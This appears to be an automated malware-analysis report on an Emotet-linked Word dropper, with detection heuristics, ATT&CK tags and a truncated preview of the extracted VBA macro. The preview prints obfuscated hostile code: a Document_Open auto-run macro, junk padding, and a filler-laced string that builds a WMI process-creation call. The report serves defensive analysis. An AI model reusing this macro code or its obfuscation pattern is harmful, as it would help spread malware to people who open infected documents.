MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro that is designed to execute obfuscated code. The ClamAV detection name 'Doc.Dropper.EmotetWinMob0920-9636503-0' strongly suggests Emotet family involvement and a dropper functionality. The macro's intent is to likely download and execute a second-stage payload, a common Emotet tactic.
Heuristics 6
-
ClamAV: Doc.Dropper.EmotetWinMob0920-9636503-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.EmotetWinMob0920-9636503-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13494 bytes |
SHA-256: df857c45a3db5c6a6e31b970591a532912501f3c33d6cd46e3e570cfe8278778 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Kfdzxxqiyvtvsiq7ja"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Call H89x3z3b5tq.O36u5ofen_mter6l7
End Sub
Attribute VB_Name = "H89x3z3b5tq"
Attribute VB_Base = "0{781EB210-E01F-4F11-8E0C-5960A5A82410}{4A19C725-4461-4CAD-9D1F-953D9ABC6782}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function O36u5ofen_mter6l7()
On Error Resume Next
Set HLklks = NJLLKsd
C77ezmf967qy = jsjjswww + wiiwjdd * Q0bj1xh6z9mj7 / CLng(ajakhiq) _
/ qugjasd / CLng(rre * qwewq) - fhaodw * CDate(bhuoqwgof) * jsjsw / Log(W7m4aeu6w2ywjwwjsi)
Kcnmcm1ljjmwqdk7 = Chr(666 - Atn(qwohqd) / jbkqwkje / Tan(iuqwgjd / iuqghjwasd))
Z26g75hza8qyisw = W337p7keeywvf9bh
Znu8p5bcpsiix = (jkbasd / Eqhs43nlveovjqq)
T1qmio29yv9 = CDate(qwiiwi)
Pdow4_o9qtifxcpky = qwkljkwq - Sin(qwhii) - dklhiasd - CBool(qwewqe) / 334 + Fix(qwkhsd)
Eolpqmexjya57j = 105
On Error Resume Next
Set HLklks = NJLLKsd
C77ezmf967qy = jsjjswww + wiiwjdd * Q0bj1xh6z9mj7 / CLng(ajakhiq) _
/ qugjasd / CLng(rre * qwewq) - fhaodw * CDate(bhuoqwgof) * jsjsw / Log(W7m4aeu6w2ywjwwjsi)
Kcnmcm1ljjmwqdk7 = Chr(666 - Atn(qwohqd) / jbkqwkje / Tan(iuqwgjd / iuqghjwasd))
Z26g75hza8qyisw = W337p7keeywvf9bh
Znu8p5bcpsiix = (jkbasd / Eqhs43nlveovjqq)
T1qmio29yv9 = CDate(qwiiwi)
Pdow4_o9qtifxcpky = qwkljkwq - Sin(qwhii) - dklhiasd - CBool(qwewqe) / 334 + Fix(qwkhsd)
C87dh_ylw_mq0pw9ng = ChrW$(Eolpqmexjya57j + (10))
On Error Resume Next
Set HLklks = NJLLKsd
C77ezmf967qy = jsjjswww + wiiwjdd * Q0bj1xh6z9mj7 / CLng(ajakhiq) _
/ qugjasd / CLng(rre * qwewq) - fhaodw * CDate(bhuoqwgof) * jsjsw / Log(W7m4aeu6w2ywjwwjsi)
Kcnmcm1ljjmwqdk7 = Chr(666 - Atn(qwohqd) / jbkqwkje / Tan(iuqwgjd / iuqghjwasd))
Z26g75hza8qyisw = W337p7keeywvf9bh
Znu8p5bcpsiix = (jkbasd / Eqhs43nlveovjqq)
T1qmio29yv9 = CDate(qwiiwi)
Pdow4_o9qtifxcpky = qwkljkwq - Sin(qwhii) - dklhiasd - CBool(qwewqe) / 334 + Fix(qwkhsd)
Umwcd3y6cqklwu = "26{} 328[]9 gv]bhja[]26{} 328[]9 gv]bhja[]w26{} 328[]9 gv]bhja[]i26{} 328[]9 gv]bhja[]nm26{} 328[]9 gv]bhja[]26{} 328[]9 gv]bhja[]gm26{} 328[]9 gv]bhja[]t26{} 328[]9 gv]bhja[]26{} 328[]9 gv]bhja[]" + C87dh_ylw_mq0pw9ng + "26{} 328[]9 gv]bhja[]26{} 328[]9 gv]bhja[]:26{} 328[]9 gv]bhja[]w26{} 328[]9 gv]bhja[]in26{} 328[]9 gv]bhja[]26{} 328[]9 gv]bhja[]326{} 328[]9 gv]bhja[]226{} 328[]9 gv]bhja[]_26{} 328[]9 gv]bhja[]" + H89x3z3b5tq.B72kqfa50fk06as9d + "26{} 328[]9 gv]bhja[]ro26{} 328[]9 gv]bhja[]26{} 328[]9 gv]bhja[]ce26{} 328[]9 gv]bhja[]s26{} 328[]9 gv]bhja[]s26{} 328[]9 gv]bhja[]"
On Error Resume Next
Set HLklks = NJLLKsd
C77ezmf967qy = jsjjswww + wiiwjdd * Q0bj1xh6z9mj7 / CLng(ajakhiq) _
/ qugjasd / CLng(rre * qwewq) - fhaodw * CDate(bhuoqwgof) * jsjsw / Log(W7m4aeu6w2ywjwwjsi)
Kcnmcm1ljjmwqdk7 = Chr(666 - Atn(qwohqd) / jbkqwkje / Tan(iuqwgjd / iuqghjwasd))
Z26g75hza8qyisw = W337p7keeywvf9bh
Znu8p5bcpsiix = (jkbasd / Eqhs43nlveovjqq)
T1qmio29yv9 = CDate(qwiiwi)
Pdow4_o9qtifxcpky = qwkljkwq - Sin(qwhii) - dklhiasd - CBool(qwewqe) / 334 + Fix(qwkhsd)
Ofk00rxxidze8 = Nvub5bswsefx(Umwcd3y6cqklwu)
On Error Resume Next
Set HLklks = NJLLKsd
C77ezmf967qy = jsjjswww + wiiwjdd * Q0bj1xh6z9mj7 / CLng(ajakhiq) _
/ qugjasd / CLng(rre * qwewq) - fhaodw * CDate(bhuoqwgof) * jsjsw / Log(W7m4aeu6w2ywjwwjsi)
Kcnmcm1ljjmwqdk7 = Chr(666 - Atn(qwohqd) / jbkqwkje / Tan(iuqwgjd / iuqghjwasd))
Z26g75hza8qyisw = W337p7keeywvf9bh
Znu8p5bcpsiix = (jkbasd / Eqhs43nlveovjqq)
T1qmio29yv9 = CDate(qwiiwi)
Pdow4_o9qtifxcpky = qwkljkwq - Sin(qwhii) - dklhiasd - CBool(qwewqe) / 334 + Fix(qwkhsd)
On Error Resume Next
Set HLklks = NJLLKsd
C77ezmf967qy = jsjjswww + wiiwjdd * Q0bj1xh6z9mj7 / CLng(ajakhiq) _
/ qugjasd / CLng(rre * qwewq) - fhaodw * CDate(bhuoq
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.